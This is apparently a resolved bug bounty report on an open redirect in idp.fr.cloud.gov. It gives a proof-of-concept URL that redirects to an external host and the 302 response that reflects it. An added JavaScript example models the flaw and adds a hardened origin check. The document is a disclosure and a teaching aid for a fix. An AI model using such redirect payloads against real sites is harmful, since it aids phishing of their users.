[idp.fr.cloud.gov] Open Redirect
Low
## Vulnerability Details
**Description:** Open Redirect
**Domain:** idp.fr.cloud.gov
**Steps To Reproduce:**
Open URL:
```
https://idp.fr.cloud.gov//blackfan.ru/..;/css
```
**HTTP Response**
```
HTTP/1.1 302 Found
...
Location: //blackfan.ru/..;/css/
...
```
## Impact
A web application accepts a user-controlled input that specifies a link to an external site, and uses that link in a Redirect. This simplifies phishing attacks.
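The following is an added example, not part of the original report or of the cloud.gov code base. It models the behaviour visible in the response above (the request path reflected into `Location` with a trailing slash appended), resolves that value the way a browser does, and shows a hardened variant. The function names are hypothetical, and the assumption that the redirect is a trailing-slash redirect is inferred only from the request and response shown.

```javascript
// Added example; helper names are hypothetical, not from the report.
const ORIGIN = 'https://idp.fr.cloud.gov'; // host taken from the report

// Resolve a Location value with WHATWG URL rules (what browsers apply)
// and report whether it points away from the origin that served it.
function leavesOrigin(location, origin = ORIGIN) {
  let resolved;
  try {
    resolved = new URL(location, origin + '/');
  } catch {
    return true; // unparseable target: treat as unsafe
  }
  return resolved.origin !== new URL(origin).origin;
}

// Model of the observed behaviour: the request path is echoed into
// Location with a trailing slash appended and nothing else changed.
function naiveSlashRedirect(requestPath) {
  return requestPath.endsWith('/') ? requestPath : requestPath + '/';
}

// Hardened variant: collapse leading slashes so the value cannot be
// scheme-relative ("//host/..."), then verify the resolved origin and
// fall back to the site root if it still points elsewhere.
function safeSlashRedirect(requestPath, origin = ORIGIN) {
  const collapsed = '/' + requestPath.replace(/^\/+/, '');
  const target = collapsed.endsWith('/') ? collapsed : collapsed + '/';
  return leavesOrigin(target, origin) ? '/' : target;
}

// Paths to compare: the one from the report plus a constructed benign one.
const samples = ['//blackfan.ru/..;/css', '/css'];
for (const path of samples) {
  const naive = naiveSlashRedirect(path);
  const safe = safeSlashRedirect(path);
  console.log(JSON.stringify({
    path,
    naive, naiveLeavesOrigin: leavesOrigin(naive),
    safe, safeLeavesOrigin: leavesOrigin(safe),
  }));
}
```

The same `leavesOrigin` check can run as a response filter or in a regression test over every 3xx response the application emits.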
## Report Stats
- Report ID: 387007
- State: Closed
- Substate: resolved
- Upvotes: 25